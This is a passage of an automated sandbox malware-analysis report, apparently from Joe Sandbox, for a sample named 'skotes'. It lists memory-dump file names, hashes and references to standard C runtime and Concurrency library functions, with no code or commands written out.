                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 893951542-0
                                                                                                                                            • Opcode ID: 071ddf5e1335f08edab59934fd5b02b5e2cb60ae3c9b64e32b67aaa01158286e
                                                                                                                                            • Instruction ID: eaa47594b44983239e6860ba593b3b9cdb432bf9ed58567c854387e56ee24b0f
                                                                                                                                            • Opcode Fuzzy Hash: 071ddf5e1335f08edab59934fd5b02b5e2cb60ae3c9b64e32b67aaa01158286e
                                                                                                                                            • Instruction Fuzzy Hash: 74315736B01610CFCF05AF20D885EAD77A6AF88710F1882B9E9069F355DF70AD058790
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00AE2D0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3433162309-0
                                                                                                                                            • Opcode ID: 78006c62572c36eccdc12d7f3f8b016a22fa6db1780bd27d4f03a0530304dbf9
                                                                                                                                            • Instruction ID: 38743aea046f00ee781ea9d24b893072b125b777bf5aacd3ab6296c4b8b943c2
                                                                                                                                            • Opcode Fuzzy Hash: 78006c62572c36eccdc12d7f3f8b016a22fa6db1780bd27d4f03a0530304dbf9
                                                                                                                                            • Instruction Fuzzy Hash: 29315875A00349DFCF10DF95C9C0BAE7BB9BF44310F1404AADA01AB346DB70A944CBA0
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00AF13FC
                                                                                                                                            • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00AF1447
                                                                                                                                            • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00AF147A
                                                                                                                                            • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00AF152A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2092016602-0
                                                                                                                                            • Opcode ID: 97f28620c730b78ae8f904f55dd1281e52619386cea5d26f9852f12884485101
                                                                                                                                            • Instruction ID: 2490b94fbc192c6e5439b11eb57f56b2219fe8b40a36c8e1f1f89240ada76602
                                                                                                                                            • Opcode Fuzzy Hash: 97f28620c730b78ae8f904f55dd1281e52619386cea5d26f9852f12884485101
                                                                                                                                            • Instruction Fuzzy Hash: 663152B1A0060ADBCF14EFA9C5919EDFBB5BF88710B54822DF516A7391CB34A941CB90
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                            • Opcode ID: e2a219761f5fbb254a283edb47c7ff82560c66b1989191326d06c34f26e3a0bc
                                                                                                                                            • Instruction ID: ab95692c956fc05a219dd22b5db97d9d4a3806d86b94c4fe839d970226d07c27
                                                                                                                                            • Opcode Fuzzy Hash: e2a219761f5fbb254a283edb47c7ff82560c66b1989191326d06c34f26e3a0bc
                                                                                                                                            • Instruction Fuzzy Hash: DC210C71A1021AAFDF00EFA4D985AFEB7B9EF08720F91401AF502A7351DB709D419BA0
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00AE9C9C
                                                                                                                                            • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00AE9CE8
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00AE9CFE
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00AE9D6A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
